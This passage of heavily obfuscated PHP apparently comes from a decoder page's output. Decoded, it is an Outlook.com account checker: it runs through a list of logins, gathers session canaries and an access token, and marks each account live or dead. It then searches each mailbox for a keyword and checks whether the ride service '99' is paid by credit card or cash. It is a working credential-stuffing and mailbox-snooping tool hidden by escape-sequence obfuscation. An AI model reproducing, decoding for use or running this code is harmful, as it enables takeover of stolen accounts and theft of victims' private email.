"\x75\163\145\162\55\x61\x67\145\x6e\164\x3a\x20\115\157\x7a\x69\x6c\154\141\57\65\56\60\40\x28\x57\x69\156\x64\157\x77\163\x20\116\124\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\156\x36\x34\73\x20\170\x36\x34\x29\40\101\160\160\x6c\x65\127\145\x62\x4b\151\164\57\65\63\x37\x2e\63\66\40\x28\113\110\x54\115\x4c\54\x20\x6c\x69\x6b\145\x20\107\145\143\153\157\x29\40\x43\x68\162\157\x6d\145\x2f\x31\61\64\x2e\x30\56\60\x2e\60\40\x53\x61\x66\141\x72\151\x2f\x35\63\67\56\63\66", "\x63\x6f\156\x74\145\x6e\x74\55\164\171\x70\145\x3a\40\141\x70\x70\154\x69\x63\x61\164\151\157\x6e\x2f\152\x73\x6f\156\73\40\x63\x68\x61\162\163\x65\164\75\x75\164\146\x2d\x38", "\141\143\x74\151\x6f\156\x3a\40\x47\145\164\101\164\164\141\143\x68\x6d\145\x6e\164\x50\162\x65\166\151\x65\x77\x73", "\141\x63\143\145\x70\164\x3a\40\52\57\52", "\157\162\151\x67\x69\156\72\x20\150\164\164\x70\163\72\57\57\x6f\165\x74\154\x6f\157\153\56\154\x69\x76\x65\x2e\x63\x6f\x6d", "\163\145\x63\55\x66\145\x74\x63\150\55\x73\151\164\x65\x3a\40\x73\x61\155\145\x2d\x6f\162\x69\147\x69\x6e", "\x73\145\x63\x2d\x66\145\164\x63\x68\55\155\157\144\145\72\40\143\x6f\x72\163", "\x73\x65\x63\55\x66\x65\x74\143\150\55\144\145\163\164\x3a\40\145\x6d\x70\164\171", "\x72\x65\146\145\162\145\162\x3a\40\150\x74\x74\x70\163\72\x2f\x2f\157\x75\164\x6c\x6f\x6f\x6b\56\154\x69\x76\x65\56\143\157\155\x2f", "\x61\x63\x63\x65\160\x74\55\x6c\x61\x6e\x67\165\x61\147\145\72\40\x70\164\x2d\x42\x52\x2c\x70\x74\73\x71\75\x30\x2e\71\54\145\x6e\x2d\x55\x53\73\161\75\60\56\70\54\x65\156\73\x71\75\60\56\x37"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "\55\x2d\x63\157\155\160\162\145\163\x73\145\144"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary4 = trazer($resp, "\x58\x2d\117\127\x41\55\103\101\116\101\122\x59\x3d", "\73"); $url = "\x68\x74\x74\x70\x73\72\57\57\157\165\164\154\x6f\x6f\153\56\154\151\166\x65\56\x63\x6f\155\57\x6f\x77\141\57\60\57\163\145\x72\x76\151\x63\145\x2e\163\166\143\77\141\143\164\151\157\156\x3d\107\x65\x74\x42\160\x6f\x73\x53\x68\x65\x6c\154\111\156\146\157\116\x61\x76\x42\141\162\x44\x61\x74\x61\46\141\x70\160\75\115\141\151\x6c\46\156\x3d\61\70"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\x2f\143\x6f\157\x6b\151\145\x2e\164\170\164"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\x2f\x63\157\x6f\153\x69\145\56\164\x78\x74"); $headers = array("\x48\157\163\164\x3a\40\x6f\x75\x74\154\157\x6f\153\x2e\x6c\151\166\145\56\143\x6f\x6d", "\x70\x72\x65\146\x65\162\72\x20\x65\x78\143\x68\x61\x6e\147\x65\56\142\145\x68\141\x76\x69\157\x72\x3d\x22\111\x6e\x63\154\x75\x64\x65\x54\x68\x69\x72\144\120\141\x72\164\171\117\156\x6c\x69\156\x65\115\145\145\164\x69\156\x67\120\x72\157\x76\x69\x64\145\162\163\x22", "\x64\156\x74\x3a\40\x31", "\x78\55\162\x65\161\x2d\x73\x6f\x75\x72\x63\x65\72\40\x4d\x61\151\154", "\x78\55\157\167\x61\55\x63\141\156\x61\162\x79\72\40{$canary4}", "\x73\x65\x63\55\x63\150\55\165\141\x2d\155\157\x62\x69\154\145\72\40\x3f\x30", "\x75\x73\145\162\55\141\x67\145\x6e\x74\72\x20\115\157\x7a\151\x6c\154\x61\57\65\56\x30\40\50\x57\151\156\x64\157\x77\x73\x20\116\124\40\x31\x30\56\60\x3b\x20\x57\x69\x6e\66\x34\73\40\170\66\x34\51\40\x41\160\160\x6c\x65\x57\145\142\x4b\151\164\x2f\65\x33\67\x2e\63\x36\x20\x28\x4b\110\124\115\x4c\54\40\x6c\x69\x6b\145\x20\x47\145\x63\153\157\x29\40\x43\x68\162\157\155\145\57\x31\x31\x34\56\60\56\60\56\x30\x20\x53\141\x66\141\162\x69\57\65\63\x37\56\x33\x36", "\170\x2d\157\x77\141\x2d\x75\x72\x6c\160\157\163\164\x64\141\164\141\72\40\x25\x37\x42\45\x37\x44", "\143\x6f\156\164\x65\x6e\164\x2d\x74\x79\160\145\x3a\x20\x61\160\x70\154\151\143\141\164\151\157\156\57\152\163\x6f\156\x3b\x20\x63\x68\x61\162\163\145\164\x3d\165\x74\x66\55\x38", "\x61\143\164\x69\x6f\156\72\40\107\x65\164\x42\x70\157\163\123\150\145\x6c\x6c\x49\156\146\x6f\x4e\141\166\102\141\162\104\x61\x74\x61", "\x61\x63\x63\145\160\x74\72\40\52\x2f\52", "\x6f\x72\151\x67\x69\x6e\x3a\40\150\x74\x74\x70\163\x3a\57\57\x6f\165\x74\x6c\x6f\157\153\x2e\154\151\166\x65\56\x63\x6f\155", "\163\145\143\55\x66\x65\164\x63\150\x2d\x73\x69\x74\x65\72\x20\x73\x61\155\145\55\157\x72\151\147\151\x6e", "\163\x65\x63\x2d\146\x65\x74\143\150\55\155\157\x64\145\x3a\x20\x63\157\x72\163", "\163\145\x63\55\146\145\x74\x63\x68\55\x64\x65\x73\164\x3a\x20\145\155\x70\x74\x79", "\x72\145\146\145\x72\145\x72\x3a\x20\150\164\164\x70\163\x3a\57\x2f\157\165\164\154\157\x6f\153\x2e\x6c\151\x76\145\x2e\x63\157\x6d\57", "\x61\x63\143\145\x70\164\x2d\154\x61\x6e\x67\x75\141\147\145\x3a\x20\x70\x74\55\x42\122\x2c\x70\x74\x3b\161\x3d\60\x2e\x39\54\x65\156\x2d\125\x53\73\161\x3d\x30\56\x38\54\145\156\73\x71\75\x30\56\x37"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "\55\55\x63\157\x6d\x70\x72\145\x73\163\x65\144"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary5 = trazer($resp, "\x58\x2d\x4f\x57\x41\55\103\x41\116\x41\x52\x59\75", "\73"); $url = "\150\x74\164\x70\163\72\57\x2f\x6f\x75\x74\154\157\x6f\x6b\56\154\x69\x76\145\56\143\157\155\x2f\x6f\167\141\57\x30\57\163\145\162\166\x69\143\x65\56\163\166\x63\77\141\143\x74\x69\157\x6e\x3d\107\145\x74\x41\x63\x63\145\x73\163\124\157\153\145\156\x66\157\x72\122\145\x73\x6f\165\162\143\145\x26\125\101\75\x30\x26\x61\160\x70\75\x4d\x61\x69\154\46\156\75\x32\61"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "\x2f\143\x6f\157\x6b\151\145\56\x74\x78\x74"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "\x2f\x63\x6f\x6f\x6b\151\x65\56\164\170\x74"); $headers = array("\110\157\163\164\x3a\40\x6f\165\x74\x6c\157\157\153\56\x6c\x69\x76\145\56\143\x6f\x6d", "\160\x72\145\146\145\162\72\40\145\170\x63\150\141\156\147\x65\x2e\142\x65\x68\x61\x76\151\157\x72\75\42\x49\x6e\143\154\165\x64\x65\x54\150\151\162\x64\x50\141\162\x74\x79\117\x6e\154\151\x6e\145\115\145\x65\x74\x69\x6e\x67\120\x72\x6f\166\x69\144\145\x72\x73\x22", "\x64\x6e\164\72\40\x31", "\x78\x2d\x72\145\x71\55\x73\157\x75\162\143\x65\x3a\x20\115\x61\x69\154", "\x78\55\157\x77\141\55\143\141\156\x61\x72\x79\x3a\40{$canary5}", "\163\x65\x63\55\x63\x68\x2d\x75\141\x2d\155\157\142\151\154\145\x3a\x20\77\60", "\x75\163\x65\x72\55\x61\x67\x65\156\164\72\x20\x4d\157\172\151\154\x6c\141\57\x35\56\x30\x20\x28\x57\151\x6e\x64\157\x77\x73\x20\x4e\x54\40\61\60\x2e\60\73\x20\127\x69\156\66\64\73\x20\170\66\x34\x29\x20\x41\160\x70\154\145\127\x65\142\113\151\x74\57\65\x33\67\56\63\66\x20\x28\113\x48\124\x4d\114\x2c\x20\154\151\153\x65\40\107\145\x63\x6b\x6f\x29\40\103\x68\162\157\155\145\x2f\x31\x31\64\56\60\x2e\x30\56\60\40\x53\141\x66\x61\x72\151\x2f\x35\63\x37\56\x33\x36", "\170\x2d\157\167\141\x2d\x75\162\x6c\x70\x6f\163\x74\x64\x61\x74\141\x3a\x20\45\x37\x42\45\62\62\x5f\137\164\171\x70\x65\x25\x32\x32\x25\x33\101\x25\x32\x32\124\157\x6b\x65\x6e\x52\x65\161\x75\145\163\x74\x25\63\101\45\x32\63\x45\x78\x63\x68\141\x6e\x67\x65\x25\62\62\x25\x32\103\x25\62\x32\122\x65\163\157\x75\162\143\x65\45\62\x32\45\63\101\45\x32\x32\150\x74\x74\160\x73\45\x33\x41\45\62\106\45\x32\106\157\x75\164\x6c\157\157\153\x2e\x6c\x69\x76\145\x2e\143\157\x6d\x25\62\x32\x25\67\104", "\143\x6f\156\x74\x65\156\164\55\164\171\x70\145\x3a\40\141\x70\x70\154\151\143\x61\x74\151\157\x6e\x2f\x6a\163\x6f\156\x3b\x20\143\x68\141\x72\x73\145\x74\x3d\x75\164\146\x2d\70", "\141\143\164\x69\x6f\x6e\72\40\x47\x65\164\101\x63\143\145\x73\163\124\157\x6b\x65\x6e\146\157\162\122\x65\x73\x6f\165\162\143\145", "\x61\143\143\x65\x70\164\72\40\52\x2f\52", "\x6f\x72\x69\147\151\x6e\72\40\150\164\164\160\x73\x3a\x2f\x2f\157\x75\164\154\157\x6f\x6b\56\x6c\x69\166\145\56\143\157\x6d", "\x73\145\143\x2d\146\x65\x74\x63\x68\x2d\163\151\164\x65\x3a\40\163\x61\155\x65\x2d\157\x72\151\x67\151\156", "\x73\145\143\x2d\x66\x65\164\143\x68\x2d\155\x6f\144\x65\72\x20\x63\157\162\163", "\x73\145\143\55\x66\145\164\143\150\x2d\144\x65\x73\164\72\x20\145\x6d\x70\164\x79", "\x72\145\x66\145\x72\145\x72\72\x20\x68\164\164\160\163\72\57\57\x6f\165\164\x6c\x6f\157\x6b\56\x6c\x69\166\145\56\143\x6f\155\x2f", "\x61\x63\143\x65\160\x74\x2d\154\141\x6e\x67\x75\x61\x67\145\x3a\40\160\164\x2d\102\x52\54\x70\x74\73\x71\x3d\x30\56\71\x2c\x65\156\x2d\x55\123\x3b\161\75\60\x2e\x38\x2c\145\x6e\x3b\x71\75\x30\x2e\67"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "\x2d\55\143\x6f\155\160\162\x65\x73\x73\x65\x64"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $key = trazer($resp, "\x22\101\143\143\145\x73\163\x54\x6f\153\x65\x6e\x22\72\42", "\x22"); $url = "\x68\164\x74\160\163\x3a\x2f\57\157\x75\x74\154\157\157\153\56\154\151\166\145\56\x63\x6f\155\57\x73\145\141\x72\x63\x68\x2f\x61\160\x69\x2f\166\x32\x2f\161\165\145\x72\171\x3f\x6e\75\x31\66\62\x26\143\166\75\120\x37\x39\x4a\61\115\145\x37\161\112\x74\144\45\62\x46\130\x6b\63\67\x54\122\x76\x55\x49\x2e\x31\x37\x35"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $headers = array("\110\157\x73\164\x3a\x20\157\x75\x74\154\157\x6f\153\56\x6c\151\x76\x65\x2e\143\157\x6d", "\x78\x2d\x73\x65\x61\x72\x63\150\55\147\162\151\146\146\151\x6e\x2d\166\x65\162\x73\151\x6f\x6e\x3a\x20\107\x57\x53\166\62", "\x64\x6e\x74\72\40\61", "\x73\143\x65\156\141\162\x69\157\164\x61\147\x3a\40\x31\x73\x74\x50\147\x5f\155\x67", "\170\55\155\163\x2d\141\x70\160\156\141\155\145\x3a\x20\x6f\167\141\55\162\145\141\x63\164\155\141\x69\x6c", "\141\143\143\145\160\164\x2d\154\141\156\x67\165\141\x67\145\72\40\x70\164\x2d\x42\x52", "\141\165\x74\150\157\x72\151\x7a\141\x74\151\157\x6e\x3a\40\102\145\x61\162\145\162\40{$key}", "\x78\x2d\141\x6e\x63\150\157\x72\155\x61\151\x6c\x62\x6f\x78\x3a\x20\123\115\124\x50\x3a{$email}", "\x78\55\x63\x6c\x69\x65\x6e\x74\x2d\x66\154\151\x67\x68\164\163\x3a\x20\x4f\127\x41\137\102\x65\163\164\x4d\x61\x74\x63\150\137\x56\x31\x35\x2c\x43\x61\x6c\x65\x6e\144\141\x72\111\x6e\163\x69\147\x68\x74\x73\106\154\151\147\150\x74\x2c\105\x6e\x61\142\x6c\145\x50\x65\157\x70\154\145\120\x69\x6c\154\107\150\x6f\163\164\x69\x6e\147\x4f\127\x41\54\x43\x61\x6c\x65\156\x64\x61\x72\101\156\x73\x77\145\x72\x46\x6c\x69\x67\150\x74\54\x43\141\154\x65\156\144\141\x72\x41\x6e\x73\167\x65\x72\x57\151\x74\x68\x51\x61\163\54\103\141\x6c\x65\x6e\x64\141\x72\101\x6e\163\167\145\x72\x43\x6f\x6e\146\x6c\x69\x63\164\163\x2c\x43\x61\x6c\145\156\144\x61\x72\x49\156\x73\x69\147\150\164\x73\x46\154\x69\x67\x68\164\54\x43\157\156\x66\154\151\x63\x74\x73\x49\x6e\x43\141\x6c\145\x6e\x64\x61\x72\x49\156\163\151\x67\x68\x74\163\x2c\142\x66\x62\x66\151\x6c\x65\141\x6e\x73\x6f\x66\146\54\x46\145\x74\x63\150\106\151\154\x65\101\x72\x74\151\x66\141\143\x74\163", "\170\55\162\145\161\x2d\163\x6f\165\162\143\145\x3a\x20\x4d\x61\x69\x6c", "\163\x65\x63\x2d\x63\x68\x2d\x75\x61\x2d\x6d\x6f\142\x69\154\x65\x3a\40\x3f\60", "\165\163\x65\162\55\x61\147\145\x6e\164\x3a\x20\x4d\157\x7a\x69\154\x6c\141\x2f\x35\x2e\60\x20\x28\x57\151\156\x64\x6f\x77\163\40\116\124\x20\x31\60\x2e\x30\73\40\x57\151\x6e\x36\x34\x3b\40\170\x36\64\51\40\x41\160\x70\x6c\145\127\x65\142\113\151\x74\57\x35\63\x37\x2e\63\x36\40\50\113\110\x54\x4d\114\x2c\40\x6c\151\x6b\x65\40\x47\145\x63\153\157\x29\x20\x43\150\x72\x6f\x6d\x65\x2f\x31\x31\64\x2e\x30\x2e\x30\x2e\x30\40\x53\141\146\141\x72\x69\x2f\x35\63\67\56\x33\66", "\x63\157\156\x74\145\x6e\164\55\x74\x79\160\145\72\x20\x61\160\160\154\151\x63\x61\164\151\x6f\x6e\57\152\163\x6f\156", "\170\55\x72\157\x75\x74\x69\x6e\x67\x70\x61\x72\141\155\x65\164\145\x72\55\163\145\163\163\151\157\x6e\x6b\145\171\72\x20\x53\x4d\124\120\x3a{$email}", "\x61\x63\143\145\x70\164\x3a\40\x2a\x2f\52", "\157\162\151\x67\x69\x6e\x3a\x20\150\x74\164\x70\x73\x3a\57\x2f\x6f\165\x74\154\x6f\x6f\153\x2e\154\151\166\x65\56\x63\157\155", "\163\x65\x63\55\x66\145\164\x63\x68\x2d\x73\151\164\145\72\x20\163\141\x6d\145\55\x6f\162\x69\147\151\x6e", "\x73\x65\143\55\146\145\164\x63\150\x2d\155\x6f\144\x65\x3a\x20\x63\x6f\162\163", "\x73\x65\x63\55\146\145\164\x63\150\x2d\x64\145\x73\x74\x3a\x20\145\x6d\x70\x74\x79", "\x72\x65\x66\x65\x72\145\162\x3a\40\150\164\164\160\163\72\x2f\57\157\x75\x74\154\x6f\x6f\x6b\56\x6c\151\166\x65\56\143\x6f\x6d\57"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "\173\42\103\166\151\x64\x22\x3a\42\x61\64\145\x32\70\x61\x64\65\x2d\x63\141\65\64\x2d\141\x61\63\x32\55\65\x38\x63\x65\55\145\x32\145\62\x37\x38\x62\x34\x30\x38\x38\x36\x22\x2c\x22\x53\x63\x65\x6e\141\162\151\x6f\42\72\173\x22\x4e\x61\x6d\145\x22\x3a\42\x6f\x77\141\x2e\x72\x65\141\x63\164\42\175\x2c\42\124\x69\x6d\145\132\157\x6e\x65\x22\72\42\125\x54\103\x2d\x30\x32\x22\x2c\42\124\x65\x78\x74\x44\x65\x63\x6f\x72\141\x74\x69\157\x6e\163\42\x3a\x22\x4f\x66\146\42\x2c\42\105\156\164\151\164\171\x52\x65\161\165\x65\x73\164\163\x22\x3a\x5b\x7b\x22\105\156\164\151\x74\x79\124\x79\x70\145\42\x3a\42\x4d\145\163\x73\141\x67\145\42\x2c\42\103\x6f\156\x74\145\156\164\x53\157\165\x72\x63\145\163\x22\x3a\133\x22\105\170\143\150\141\156\147\145\42\x5d\x2c\x22\x46\151\x6c\164\x65\x72\x22\72\x7b\42\117\x72\x22\x3a\x5b\173\42\x54\145\x72\155\x22\72\x7b\x22\104\x69\x73\164\151\x6e\147\165\151\x73\150\145\144\x46\157\x6c\144\145\162\x4e\x61\x6d\145\x22\x3a\x22\x6d\x73\x67\x66\x6f\154\144\x65\x72\x72\x6f\x6f\x74\x22\x7d\175\x2c\x7b\x22\x54\145\162\x6d\42\x3a\173\42\104\x69\x73\164\x69\156\x67\165\x69\x73\x68\x65\144\106\x6f\154\144\x65\162\116\141\155\x65\x22\x3a\x22\104\145\x6c\145\164\x65\144\111\164\x65\x6d\x73\x22\175\175\135\175\x2c\42\106\162\x6f\x6d\x22\72\60\x2c\x22\121\165\x65\162\x79\42\x3a\173\42\121\165\x65\162\x79\x53\x74\x72\x69\156\x67\x22\72\42" . $palavrachave . "\x22\175\54\42\x52\x65\x66\x69\x6e\x69\156\x67\x51\x75\145\162\x69\x65\163\x22\72\x6e\x75\154\154\54\x22\123\x69\172\x65\42\72\x32\65\54\x22\x53\157\x72\164\42\x3a\x5b\x7b\x22\106\151\145\154\144\42\x3a\x22\123\x63\x6f\x72\x65\x22\54\42\123\x6f\162\164\104\x69\162\145\x63\x74\151\157\x6e\42\72\42\104\x65\163\x63\x22\54\42\x43\x6f\x75\x6e\x74\42\x3a\63\x7d\x2c\173\42\106\151\145\154\x64\x22\72\42\x54\x69\x6d\x65\x22\x2c\42\123\157\x72\164\104\x69\x72\x65\143\x74\x69\157\x6e\42\72\x22\104\x65\163\143\x22\x7d\x5d\x2c\42\105\x6e\x61\142\x6c\145\x54\x6f\160\122\x65\163\165\154\x74\163\x22\x3a\164\162\165\x65\x2c\42\x54\157\x70\122\145\x73\165\154\x74\163\x43\157\165\x6e\164\x22\x3a\x33\175\135\54\42\101\x6e\163\167\x65\162\x45\156\x74\x69\164\171\122\x65\x71\165\x65\x73\164\163\42\72\133\173\42\x51\165\145\x72\171\42\72\x7b\x22\121\165\x65\x72\171\x53\x74\162\x69\156\x67\42\72\x22" . $palavrachave . "\x22\175\54\42\x45\x6e\x74\x69\x74\x79\124\x79\x70\145\163\x22\72\x5b\x22\x45\166\x65\156\164\42\54\42\106\151\x6c\145\42\x5d\x2c\x22\x46\162\x6f\x6d\x22\72\x30\x2c\x22\x53\151\x7a\145\x22\72\x31\60\54\42\105\156\x61\x62\x6c\145\x41\x73\x79\156\x63\122\x65\163\x6f\154\165\164\151\x6f\x6e\42\72\164\x72\x75\x65\175\x5d\54\42\121\165\145\x72\171\101\154\164\145\x72\x61\164\151\157\x6e\117\160\x74\151\157\x6e\163\42\x3a\x7b\42\x45\156\141\142\154\x65\x53\x75\x67\x67\x65\163\164\x69\x6f\x6e\42\x3a\164\x72\x75\145\x2c\x22\105\156\x61\142\154\145\x41\x6c\x74\145\162\141\164\151\157\x6e\42\x3a\x74\x72\165\145\x2c\x22\x53\x75\160\x70\x6f\x72\x74\x65\144\x52\x65\143\157\165\162\163\145\104\151\x73\x70\x6c\x61\x79\x54\171\160\145\x73\x22\x3a\133\x22\123\x75\x67\147\x65\163\164\151\157\156\42\x2c\42\116\157\x52\x65\163\165\154\x74\x4d\157\x64\151\146\x69\x63\141\x74\151\157\x6e\x22\54\42\116\157\x52\x65\x73\165\x6c\x74\106\157\x6c\x64\x65\162\122\145\x66\x69\156\x65\x72\x4d\157\144\x69\146\151\x63\141\164\151\157\156\x22\x2c\x22\x4e\x6f\122\x65\161\x75\145\x72\x79\x4d\x6f\x64\x69\x66\151\x63\x61\164\x69\157\156\42\54\42\115\x6f\144\x69\x66\151\143\141\x74\151\x6f\156\x22\135\x7d\x2c\x22\114\157\x67\x69\x63\141\154\x49\x64\x22\72\42\x33\x61\x35\x30\141\143\x35\143\55\145\143\142\x31\x2d\144\x61\142\142\55\62\66\x33\x61\55\x32\x62\141\x31\x30\x33\60\x39\x33\x36\x38\x61\x22\175"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $verificar = curl_exec($curl); if (strpos($verificar, $palavrachave)) { $palavra = "\74\x73\160\x61\x6e\x20\143\x6c\x61\163\x73\75\x27\164\x65\x78\164\55\163\x75\x63\143\145\163\x73\x27\x3e\123\151\155\x3c\x2f\x73\x70\141\x6e\x3e"; if ($palavrachave == "\105\161\165\x69\x70\x65\x20\71\71") { if (strpos($verificar, "\x43\141\x72\164\xc3\xa3\x6f\x20\144\x65\x20\103\x72\xc3\251\144\151\164\x6f")) { $cartao = "\x3c\163\160\x61\156\40\143\154\141\163\x73\75\x27\x74\145\x78\164\x2d\163\x75\x63\x63\145\163\x73\x27\76\x53\151\155\x3c\57\x73\x70\x61\x6e\x3e"; } else { $cartao = "\x3c\163\160\x61\156\x20\143\154\x61\x73\x73\75\x27\164\145\170\164\x2d\x64\x61\x6e\x67\145\x72\47\76\x4e\303\xa3\157\x3c\57\163\x70\x61\x6e\x3e"; } if (strpos($verificar, "\x44\151\x6e\x68\145\151\162\157")) { $Dinheiro = "\x3c\x73\160\141\x6e\x20\143\x6c\141\163\163\75\47\164\x65\x78\164\x2d\x73\x75\143\143\145\163\163\47\x3e\123\x69\x6d\74\57\163\x70\x61\x6e\x3e"; } else { $Dinheiro = "\74\x73\160\141\156\40\143\x6c\141\x73\x73\75\x27\164\x65\170\x74\55\x64\141\156\x67\x65\x72\47\x3e\116\303\xa3\x6f\x3c\x2f\163\160\141\x6e\76"; } $msg = trazer($verificar, "\124\x6f\x74\x61\x6c", "\x65\163\143\157\x6c\150\145\162"); $dados = "\x3c\163\x70\141\x6e\x20\x63\154\141\x73\x73\x3d\x27\x74\145\x78\164\x2d\167\x61\162\156\x69\x6e\147\47\x3e\133\103\157\162\162\x69\x64\x61\x73\x20\156\157\40\x44\x69\156\x68\x65\x69\x72\x6f\x3a\x3c\x2f\x73\x70\141\x6e\76\x20{$Dinheiro}\x3c\163\160\x61\x6e\x20\x63\154\141\163\163\75\x27\x74\x65\x78\164\x2d\167\141\x72\x6e\151\x6e\x67\47\76\174\103\x6f\x72\x72\151\x64\141\x73\40\x6e\x6f\x20\103\x61\162\x74\303\xa3\157\72\x3c\57\x73\160\x61\x6e\76\x20{$cartao}\x3c\163\160\x61\x6e\x20\x63\x6c\141\163\163\75\47\164\145\x78\x74\x2d\x77\141\162\156\x69\156\x67\47\76\x3c\163\x70\x61\x6e\40\x63\x6c\141\163\163\x3d\47\x74\145\x78\164\55\151\x6e\x66\x6f\47\x3e\174\125\x6c\164\x69\x6d\141\x20\103\x6f\162\162\x69\144\x61\x3a\40{$msg}\40\145\163\143\157\154\150\x65\162\x3c\57\163\160\141\156\x3e\74\x73\x70\x61\156\x20\143\x6c\141\x73\x73\x3d\47\x74\x65\x78\x74\55\167\x61\x72\156\x69\156\x67\47\76\135\x20\xe2\236\234\x20\x3c\57\x73\x70\x61\x6e\76"; } } else { $palavra = "\74\163\160\x61\x6e\x20\x63\154\141\x73\163\75\x27\x74\145\170\x74\x2d\x64\141\x6e\147\x65\x72\x27\76\116\xc3\243\x6f\x3c\57\163\160\141\x6e\x3e"; } echo "\74\142\162\76\74\163\x70\x61\156\x20\143\154\x61\163\163\75\47\x74\x65\170\164\55\x73\165\x63\143\145\x73\163\x27\76\133\43\x4c\x69\166\145\x5d\40\xe2\x9e\x9c\40\74\x2f\x73\160\x61\156\x3e\12\40\x20\x20\40\x20\40\x20\x20\74\x73\160\x61\x6e\40\143\x6c\141\x73\x73\x3d\47\164\145\x78\164\x2d\x69\x6e\x66\x6f\x27\x3e{$lista}\40\342\x9e\x9c\x20\x3c\x2f\x73\x70\141\156\x3e{$dados}\xa\x20\40\x20\x20\40\40\40\40\x3c\163\x70\x61\156\40\x63\x6c\x61\x73\x73\x3d\47\164\145\170\x74\55\167\x61\x72\156\151\156\147\x27\x3e\133\103\x6f\x6e\164\x65\155\x20\145\x6d\x61\x69\154\40\x72\145\154\x61\143\x69\157\156\x61\144\157\40\141\40{$palavrachave}\72\40{$palavra}\135\40\342\236\234\74\57\x73\x70\141\156\x3e\12\x20\x20\40\40\x20\x20\40\x20\74\163\160\x61\156\x20\x63\154\141\163\163\75\x27\164\145\x78\x74\55\x69\156\146\x6f\47\x3e\103\x65\x6e\x74\145\162\x2d\65\60\x39\74\x2f\163\160\x61\156\x3e\74\x62\162\76"; curl_close($curl); die; } else { echo "\x3c\x62\x72\x3e\74\163\x70\x61\x6e\x20\143\154\x61\x73\163\75\x27\164\145\170\x74\55\167\141\x72\156\151\x6e\x67\x27\76\133\x23\104\145\141\144\135\x20\xe2\236\234\x20\x3c\57\163\x70\x61\156\76\12\40\40\40\x20\x20\40\40\x20\x3c\163\160\x61\x6e\40\143\x6c\x61\x73\163\75\x27\x74\x65\x78\x74\x2d\151\156\146\157\47\76{$lista}\x20\342\236\x9c\40\74\x2f\x73\x70\141\x6e\x3e\xa\40\40\x20\40\40\40\40\x20\x3c\x73\x70\141\x6e\x20\x63\154\141\163\163\75\x27\x74\145\170\164\55\x64\x61\156\147\145\x72\x27\x3e\x5b\131\x6f\165\x72\40\x61\x63\x63\157\165\x6e\164\x20\x6f\162\40\x70\x61\x73\x73\x77\x6f\x72\x64\x20\151\163\40\151\x6e\143\x6f\162\x72\145\143\164\x5d\40\342\x9e\234\40\x3c\x2f\163\160\141\156\x3e\xa\x20\40\x20\40\40\40\40\x20\x3c\x73\x70\141\x6e\40\x63\154\x61\x73\x73\x3d\47\x74\x65\170\x74\x2d\151\x6e\x66\157\47\76\x43\145\x6e\164\x65\162\55\x35\x30\x39\74\57\x73\160\x61\156\76\74\x62\162\76"; curl_close($curl); die; }
Function Calls
| None |
Stats
| MD5 | ef3a72daea80d02593aa801e302bb59f |
| Eval Count | 0 |
| Decode Time | 55 ms |